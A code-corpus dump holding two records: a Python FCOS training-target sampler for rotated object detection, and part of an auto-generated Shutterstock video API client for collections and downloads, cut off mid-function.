4249720ea4dacdd60e696901df8034e5cd0a1843
|
[
"Apache-2.0"
] | null | null | null |
alpharotate/libs/models/samplers/fcos/sampler_fcos_h.py
|
junhai0428/RotationDetection
|
4249720ea4dacdd60e696901df8034e5cd0a1843
|
[
"Apache-2.0"
] | null | null | null |
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from alpharotate.libs.models.samplers.samper import Sampler
from alpharotate.libs.utils.coordinate_convert import coordinate_present_convert
class SamplerFCOS(Sampler):
def __init__(self, cfgs):
super(SamplerFCOS, self).__init__(cfgs)
def fcos_target_h(self, gt_boxes, gt_boxes_r, image_batch, fm_size_list):
gt_boxes = np.array(gt_boxes, np.int32)
raw_height, raw_width = image_batch.shape[:2]
set_win = np.asarray([-1, 64, 128, 256, 512, 1e7]) * min(raw_height, raw_width) / 800
param_num = gt_boxes_r.shape[-1]
gt_boxes = np.concatenate([np.zeros((1, 5)), gt_boxes])
gt_boxes_r = np.concatenate([np.zeros((1, param_num)), gt_boxes_r])
gt_boxes_area = (np.abs(
(gt_boxes[:, 2] - gt_boxes[:, 0]) * (gt_boxes[:, 3] - gt_boxes[:, 1])))
gt_boxes = np.array(gt_boxes[np.argsort(gt_boxes_area)], np.float32)
gt_boxes_r = np.array(gt_boxes_r[np.argsort(gt_boxes_area)], np.float32)
boxes_cnt = len(gt_boxes)
shift_x = np.array(np.arange(0, raw_width).reshape(-1, 1), np.float32)
shift_y = np.array(np.arange(0, raw_height).reshape(-1, 1), np.float32)
shift_x, shift_y = np.meshgrid(shift_x, shift_y)
shift_x, shift_y = np.array(shift_x, np.float32), np.array(shift_y, np.float32)
off_l = (shift_x[:, :, np.newaxis, np.newaxis] -
gt_boxes[np.newaxis, np.newaxis, :, 0, np.newaxis])
off_t = (shift_y[:, :, np.newaxis, np.newaxis] -
gt_boxes[np.newaxis, np.newaxis, :, 1, np.newaxis])
off_r = -(shift_x[:, :, np.newaxis, np.newaxis] -
gt_boxes[np.newaxis, np.newaxis, :, 2, np.newaxis])
off_b = -(shift_y[:, :, np.newaxis, np.newaxis] -
gt_boxes[np.newaxis, np.newaxis, :, 3, np.newaxis])
center = ((np.minimum(off_l, off_r) * np.minimum(off_t, off_b)) / (
np.maximum(off_l, off_r) * np.maximum(off_t, off_b) + self.cfgs.EPSILON))
center = np.squeeze(np.sqrt(np.abs(center)))
center[:, :, 0] = 0
offset = np.concatenate([off_l, off_t, off_r, off_b], axis=3)
cls = gt_boxes[:, 4]
cls_res_list = []
ctr_res_list = []
gt_boxes_res_list = []
for fm_i, stride in enumerate(self.cfgs.ANCHOR_STRIDE):
fm_height = fm_size_list[fm_i][0]
fm_width = fm_size_list[fm_i][1]
shift_x = np.arange(0, fm_width)
shift_y = np.arange(0, fm_height)
shift_x, shift_y = np.meshgrid(shift_x, shift_y)
xy = np.vstack((shift_y.ravel(), shift_x.ravel())).transpose()
off_xy = offset[xy[:, 0] * stride, xy[:, 1] * stride]
# off_xy = offset[xy[:, 0] * stride + int(0.5 * stride), xy[:, 1] * stride + int(0.5 * stride)]
off_max_xy = off_xy.max(axis=2)
off_valid = np.zeros((fm_height, fm_width, boxes_cnt))
is_in_boxes = (off_xy > 0).all(axis=2)
is_in_layer = (off_max_xy <= set_win[fm_i + 1]) & \
(off_max_xy >= set_win[fm_i])
off_valid[xy[:, 0], xy[:, 1], :] = is_in_boxes & is_in_layer
off_valid[:, :, 0] = 0
hit_gt_ind = np.argmax(off_valid, axis=2)
# gt_boxes
gt_boxes_res = np.zeros((fm_height, fm_width, param_num - 1))
gt_boxes_res[xy[:, 0], xy[:, 1]] = \
gt_boxes_r[hit_gt_ind[xy[:, 0], xy[:, 1]], :(param_num - 1)]
gt_boxes_res_list.append(gt_boxes_res.reshape(-1, param_num - 1))
# cls
cls_res = np.zeros((fm_height, fm_width))
cls_res[xy[:, 0], xy[:, 1]] = cls[hit_gt_ind[xy[:, 0], xy[:, 1]]]
# cv2.imwrite('./cls.jpg', cls_res * 255)
cls_res_list.append(cls_res.reshape(-1))
# centerness
center_res = np.zeros((fm_height, fm_width))
center_res[xy[:, 0], xy[:, 1]] = center[
xy[:, 0] * stride, xy[:, 1] * stride,
hit_gt_ind[xy[:, 0], xy[:, 1]]]
# center_res[xy[:, 0], xy[:, 1]] = center[
# xy[:, 0] * stride + int(0.5 * stride), xy[:, 1] * stride + int(0.5 * stride),
# hit_gt_ind[xy[:, 0], xy[:, 1]]]
# cv2.imwrite('./centerness.jpg', center_res * 255)
ctr_res_list.append(center_res.reshape(-1))
cls_res_final = np.concatenate(cls_res_list, axis=0)[:, np.newaxis]
ctr_res_final = np.concatenate(ctr_res_list, axis=0)[:, np.newaxis]
gt_boxes_res_final = np.concatenate(gt_boxes_res_list, axis=0)
return np.concatenate(
[cls_res_final, ctr_res_final, gt_boxes_res_final], axis=1)
def fcos_target_h_light(self, gt_boxes, gt_boxes_r, image_batch, fm_size_list):
gt_boxes = np.array(gt_boxes, np.int32)
raw_height, raw_width = image_batch.shape[:2]
set_win = np.asarray([-1, 64, 128, 256, 512, 1e7]) * min(raw_height, raw_width) / 800
raw_height /= self.cfgs.ANCHOR_STRIDE[0]
raw_width /= self.cfgs.ANCHOR_STRIDE[0]
param_num = gt_boxes_r.shape[-1]
if self.cfgs.ANGLE_RANGE == 180:
gt_boxes_r = coordinate_present_convert(gt_boxes_r, mode=-1, shift=False)
gt_boxes = np.concatenate([np.zeros((1, 5)), gt_boxes])
gt_boxes_r = np.concatenate([np.zeros((1, param_num)), gt_boxes_r])
gt_boxes_area = (np.abs(
(gt_boxes[:, 2] - gt_boxes[:, 0]) * (gt_boxes[:, 3] - gt_boxes[:, 1])))
gt_boxes = np.array(gt_boxes[np.argsort(gt_boxes_area)], np.float32)
gt_boxes_r = np.array(gt_boxes_r[np.argsort(gt_boxes_area)], np.float32)
boxes_cnt = len(gt_boxes)
shift_x = np.array(np.arange(0, raw_width).reshape(-1, 1), np.float32)
shift_y = np.array(np.arange(0, raw_height).reshape(-1, 1), np.float32)
shift_x, shift_y = np.meshgrid(shift_x, shift_y)
shift_x, shift_y = np.array(shift_x, np.float32) * self.cfgs.ANCHOR_STRIDE[0], np.array(shift_y, np.float32) * self.cfgs.ANCHOR_STRIDE[0]
off_l = (shift_x[:, :, np.newaxis, np.newaxis] -
gt_boxes[np.newaxis, np.newaxis, :, 0, np.newaxis])
off_t = (shift_y[:, :, np.newaxis, np.newaxis] -
gt_boxes[np.newaxis, np.newaxis, :, 1, np.newaxis])
off_r = -(shift_x[:, :, np.newaxis, np.newaxis] -
gt_boxes[np.newaxis, np.newaxis, :, 2, np.newaxis])
off_b = -(shift_y[:, :, np.newaxis, np.newaxis] -
gt_boxes[np.newaxis, np.newaxis, :, 3, np.newaxis])
center = ((np.minimum(off_l, off_r) * np.minimum(off_t, off_b)) / (
np.maximum(off_l, off_r) * np.maximum(off_t, off_b) + self.cfgs.EPSILON))
center = np.squeeze(np.sqrt(np.abs(center)))
center[:, :, 0] = 0
offset = np.concatenate([off_l, off_t, off_r, off_b], axis=3)
cls = gt_boxes[:, 4]
cls_res_list = []
ctr_res_list = []
gt_boxes_res_list = []
for fm_i, stride in enumerate(self.cfgs.ANCHOR_STRIDE):
stride //= self.cfgs.ANCHOR_STRIDE[0]
fm_height = fm_size_list[fm_i][0]
fm_width = fm_size_list[fm_i][1]
shift_x = np.arange(0, fm_width)
shift_y = np.arange(0, fm_height)
shift_x, shift_y = np.meshgrid(shift_x, shift_y)
xy = np.vstack((shift_y.ravel(), shift_x.ravel())).transpose()
off_xy = offset[xy[:, 0] * stride, xy[:, 1] * stride]
# off_xy = offset[xy[:, 0] * stride + int(0.5 * stride), xy[:, 1] * stride + int(0.5 * stride)]
off_max_xy = off_xy.max(axis=2)
off_valid = np.zeros((fm_height, fm_width, boxes_cnt))
is_in_boxes = (off_xy > 0).all(axis=2)
is_in_layer = (off_max_xy <= set_win[fm_i + 1]) & \
(off_max_xy >= set_win[fm_i])
off_valid[xy[:, 0], xy[:, 1], :] = is_in_boxes & is_in_layer
off_valid[:, :, 0] = 0
hit_gt_ind = np.argmax(off_valid, axis=2)
# gt_boxes
gt_boxes_res = np.zeros((fm_height, fm_width, param_num - 1))
gt_boxes_res[xy[:, 0], xy[:, 1]] = \
gt_boxes_r[hit_gt_ind[xy[:, 0], xy[:, 1]], :(param_num - 1)]
gt_boxes_res_list.append(gt_boxes_res.reshape(-1, param_num - 1))
# cls
cls_res = np.zeros((fm_height, fm_width))
cls_res[xy[:, 0], xy[:, 1]] = cls[hit_gt_ind[xy[:, 0], xy[:, 1]]]
# cv2.imwrite('./cls.jpg', cls_res * 255)
cls_res_list.append(cls_res.reshape(-1))
# centerness
center_res = np.zeros((fm_height, fm_width))
center_res[xy[:, 0], xy[:, 1]] = center[
xy[:, 0] * stride, xy[:, 1] * stride,
hit_gt_ind[xy[:, 0], xy[:, 1]]]
# center_res[xy[:, 0], xy[:, 1]] = center[
# xy[:, 0] * stride + int(0.5 * stride), xy[:, 1] * stride + int(0.5 * stride),
# hit_gt_ind[xy[:, 0], xy[:, 1]]]
# cv2.imwrite('./centerness.jpg', center_res * 255)
ctr_res_list.append(center_res.reshape(-1))
cls_res_final = np.concatenate(cls_res_list, axis=0)[:, np.newaxis]
ctr_res_final = np.concatenate(ctr_res_list, axis=0)[:, np.newaxis]
gt_boxes_res_final = np.concatenate(gt_boxes_res_list, axis=0)
return np.concatenate(
[cls_res_final, ctr_res_final, gt_boxes_res_final], axis=1)
def get_fcos_target_batch(self, gtboxes_batch, gtboxes_batch_r, img_batch, fm_size_list):
fcos_target_batch = []
for i in range(self.cfgs.BATCH_SIZE):
gt_target = self.fcos_target_h_light(gtboxes_batch[i], gtboxes_batch_r[i], img_batch[i], fm_size_list)
fcos_target_batch.append(gt_target)
return np.array(fcos_target_batch, np.float32)
if __name__ == '__main__':
from configs import cfgs
image = np.zeros([512, 512, 3])
gt_boxes = np.array([[11, 11, 511, 511, 1],
[127+64, 127+64, 383-64, 383-64, 2],
[0, 0, 60, 60, 4]])
gt_boxes_r = np.array([[]])
# gt_boxes = np.array([[127, 127, 383, 383, 2]])
fm_size_list = [[64, 64], [32, 32], [16, 16], [8, 8], [4, 4]]
sampler = SamplerFCOS(cfgs)
res = sampler.fcos_target_h(gt_boxes, gt_boxes_r, image, fm_size_list)
print(res.shape)
# print(res[7542, :])
print(np.argmax(res[:, 1]))
| 44.642857
| 145
| 0.571388
| 1,608
| 10,625
| 3.469527
| 0.087687
| 0.099122
| 0.032264
| 0.019358
| 0.846209
| 0.834558
| 0.815738
| 0.794766
| 0.794766
| 0.794766
| 0
| 0.041881
| 0.269647
| 10,625
| 237
| 146
| 44.831224
| 0.677062
| 0.075294
| 0
| 0.780488
| 0
| 0
| 0.000816
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.02439
| false
| 0
| 0.042683
| 0
| 0.091463
| 0.018293
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
81eae3651623d67d0de3e3b828b9da40024bbbc4
| 86,104
|
py
|
Python
|
shutterstock_api/api/videos_api.py
|
Lumen5/shutterstock-api
|
d26db2c9cd6688cf828ad15478bf1b4701150a3f
|
[
"Adobe-Glyph"
] | 1
|
2021-02-23T16:15:16.000Z
|
2021-02-23T16:15:16.000Z
|
shutterstock_api/api/videos_api.py
|
Lumen5/shutterstock-api
|
d26db2c9cd6688cf828ad15478bf1b4701150a3f
|
[
"Adobe-Glyph"
] | 17
|
2019-07-13T01:23:08.000Z
|
2022-03-21T07:17:35.000Z
|
shutterstock_api/api/videos_api.py
|
Lumen5/shutterstock-api
|
d26db2c9cd6688cf828ad15478bf1b4701150a3f
|
[
"Adobe-Glyph"
] | 1
|
2021-03-07T19:16:27.000Z
|
2021-03-07T19:16:27.000Z
|
# coding: utf-8
"""
Shutterstock API Reference
The Shutterstock API provides access to Shutterstock's library of media, as well as information about customers' accounts and the contributors that provide the media. # noqa: E501
OpenAPI spec version: 1.0.11
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from shutterstock_api.api_client import ApiClient
class VideosApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def add_clipbox_items(self, id, body, **kwargs): # noqa: E501
"""Add videos to collections # noqa: E501
This endpoint adds one or more videos to a collection by video IDs. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.add_clipbox_items(id, body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: The ID of the collection to which items should be added (required)
:param CollectionItemRequest body: Array of video IDs to add to the collection (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.add_clipbox_items_with_http_info(id, body, **kwargs) # noqa: E501
else:
(data) = self.add_clipbox_items_with_http_info(id, body, **kwargs) # noqa: E501
return data
def add_clipbox_items_with_http_info(self, id, body, **kwargs): # noqa: E501
"""Add videos to collections # noqa: E501
This endpoint adds one or more videos to a collection by video IDs. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.add_clipbox_items_with_http_info(id, body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: The ID of the collection to which items should be added (required)
:param CollectionItemRequest body: Array of video IDs to add to the collection (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method add_clipbox_items" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `add_clipbox_items`") # noqa: E501
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `add_clipbox_items`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['customer_accessCode'] # noqa: E501
return self.api_client.call_api(
'/v2/videos/collections/{id}/items', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def create_clipbox(self, body, **kwargs): # noqa: E501
"""Create video collections # noqa: E501
This endpoint creates one or more collections (clipboxes). To add videos to collections, use `POST /v2/videos/collections/{id}/items`. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_clipbox(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param CollectionCreateRequest body: Collection metadata (required)
:return: CollectionCreateResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.create_clipbox_with_http_info(body, **kwargs) # noqa: E501
else:
(data) = self.create_clipbox_with_http_info(body, **kwargs) # noqa: E501
return data
def create_clipbox_with_http_info(self, body, **kwargs): # noqa: E501
"""Create video collections # noqa: E501
This endpoint creates one or more collections (clipboxes). To add videos to collections, use `POST /v2/videos/collections/{id}/items`. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_clipbox_with_http_info(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param CollectionCreateRequest body: Collection metadata (required)
:return: CollectionCreateResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_clipbox" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `create_clipbox`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['customer_accessCode'] # noqa: E501
return self.api_client.call_api(
'/v2/videos/collections', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CollectionCreateResponse', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_clipbox(self, id, **kwargs): # noqa: E501
"""Delete video collections # noqa: E501
This endpoint deletes a collection. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_clipbox(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: The ID of the collection to delete (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_clipbox_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.delete_clipbox_with_http_info(id, **kwargs) # noqa: E501
return data
def delete_clipbox_with_http_info(self, id, **kwargs): # noqa: E501
"""Delete video collections # noqa: E501
This endpoint deletes a collection. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_clipbox_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: The ID of the collection to delete (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_clipbox" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `delete_clipbox`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = ['customer_accessCode'] # noqa: E501
return self.api_client.call_api(
'/v2/videos/collections/{id}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_clipbox_items(self, id, **kwargs): # noqa: E501
"""Remove videos from collections # noqa: E501
This endpoint removes one or more videos from a collection. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_clipbox_items(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: The ID of the Collection from which items will be deleted (required)
:param list[str] item_id: One or more video IDs to remove from the collection
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_clipbox_items_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.delete_clipbox_items_with_http_info(id, **kwargs) # noqa: E501
return data
def delete_clipbox_items_with_http_info(self, id, **kwargs): # noqa: E501
"""Remove videos from collections # noqa: E501
This endpoint removes one or more videos from a collection. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_clipbox_items_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: The ID of the Collection from which items will be deleted (required)
:param list[str] item_id: One or more video IDs to remove from the collection
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'item_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_clipbox_items" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `delete_clipbox_items`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
if 'item_id' in params:
query_params.append(('item_id', params['item_id'])) # noqa: E501
collection_formats['item_id'] = 'multi' # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = ['customer_accessCode'] # noqa: E501
return self.api_client.call_api(
'/v2/videos/collections/{id}/items', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def download_videos(self, id, body, **kwargs): # noqa: E501
"""Download videos # noqa: E501
This endpoint redownloads videos that you have already received a license for. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.download_videos(id, body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: The license ID of the item to (re)download (required)
:param RedownloadVideo body: Information about the videos to redownload (required)
:return: Url
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.download_videos_with_http_info(id, body, **kwargs) # noqa: E501
else:
(data) = self.download_videos_with_http_info(id, body, **kwargs) # noqa: E501
return data
def download_videos_with_http_info(self, id, body, **kwargs): # noqa: E501
"""Download videos # noqa: E501
This endpoint redownloads videos that you have already received a license for. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.download_videos_with_http_info(id, body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: The license ID of the item to (re)download (required)
:param RedownloadVideo body: Information about the videos to redownload (required)
:return: Url
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method download_videos" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `download_videos`") # noqa: E501
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `download_videos`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['customer_accessCode'] # noqa: E501
return self.api_client.call_api(
'/v2/videos/licenses/{id}/downloads', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Url', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_clipbox(self, id, **kwargs): # noqa: E501
"""Get the details of video collections # noqa: E501
This endpoint gets more detailed information about a collection, including the timestamp for its creation and the number of videos in it. To get the videos in collections, use GET /v2/videos/collections/{id}/items. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_clipbox(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: The ID of the collection to return (required)
:return: Collection
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_clipbox_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.get_clipbox_with_http_info(id, **kwargs) # noqa: E501
return data
def get_clipbox_with_http_info(self, id, **kwargs): # noqa: E501
"""Get the details of video collections # noqa: E501
This endpoint gets more detailed information about a collection, including the timestamp for its creation and the number of videos in it. To get the videos in collections, use GET /v2/videos/collections/{id}/items. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_clipbox_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: The ID of the collection to return (required)
:return: Collection
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_clipbox" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `get_clipbox`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['customer_accessCode'] # noqa: E501
return self.api_client.call_api(
'/v2/videos/collections/{id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Collection', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_clipbox_items(self, id, **kwargs): # noqa: E501
"""Get the contents of video collections # noqa: E501
This endpoint lists the IDs of videos in a collection and the date that each was added. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_clipbox_items(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: The ID of the Collection whose items are to be returned (required)
:param int page: Page number
:param int per_page: Number of results per page
:param str sort: Sort order
:return: CollectionItemDataList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_clipbox_items_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.get_clipbox_items_with_http_info(id, **kwargs) # noqa: E501
return data
def get_clipbox_items_with_http_info(self, id, **kwargs): # noqa: E501
"""Get the contents of video collections # noqa: E501
This endpoint lists the IDs of videos in a collection and the date that each was added. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_clipbox_items_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: The ID of the Collection whose items are to be returned (required)
:param int page: Page number
:param int per_page: Number of results per page
:param str sort: Sort order
:return: CollectionItemDataList
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'page', 'per_page', 'sort'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_clipbox_items" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `get_clipbox_items`") # noqa: E501
if 'page' in params and params['page'] < 1: # noqa: E501
raise ValueError("Invalid value for parameter `page` when calling `get_clipbox_items`, must be a value greater than or equal to `1`") # noqa: E501
if 'per_page' in params and params['per_page'] > 150: # noqa: E501
raise ValueError("Invalid value for parameter `per_page` when calling `get_clipbox_items`, must be a value less than or equal to `150`") # noqa: E501
if 'per_page' in params and params['per_page'] < 1: # noqa: E501
raise ValueError("Invalid value for parameter `per_page` when calling `get_clipbox_items`, must be a value greater than or equal to `1`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
if 'page' in params:
query_params.append(('page', params['page'])) # noqa: E501
